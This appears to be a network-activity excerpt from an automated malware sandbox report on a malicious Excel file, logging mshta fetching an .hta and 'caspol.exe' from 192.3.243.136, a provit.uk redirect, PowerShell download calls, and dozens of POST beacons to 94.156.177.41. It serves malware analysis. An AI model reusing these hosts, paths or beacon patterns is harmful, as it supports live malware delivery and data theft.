                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 176 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | If-Modified-Since: Wed, 20 Nov 2024 01:22:20 GMT | Connection: Keep-Alive | Host: 192.3.243.136 | If-None-Match: "2c850-6274dfb369376"
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: global traffic | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 149 | Connection: close
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.136
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_000007FE891A4B18 URLDownloadToFileW, 5_2_000007FE891A4B18
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A869FC32.emf
Source: global traffic | HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: provit.uk | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: provit.uk | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.243.136 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Range: bytes=8896- | Connection: Keep-Alive | Host: 192.3.243.136 | If-Range: "2c850-6274dfb369376"
Source: global traffic | HTTP traffic detected: GET /55/caspol.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.243.136 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | If-Modified-Since: Wed, 20 Nov 2024 01:22:20 GMT | Connection: Keep-Alive | Host: 192.3.243.136 | If-None-Match: "2c850-6274dfb369376"
Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: provit.uk
Source: unknown | HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 94.156.177.41 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: A6A8C306 | Content-Length: 176 | Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:56:57 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:56:59 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:00 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:01 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:02 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:03 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:05 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Wed, 20 Nov 2024 06:57:06 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | X-Powered-By: PHP/5.4.16 | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
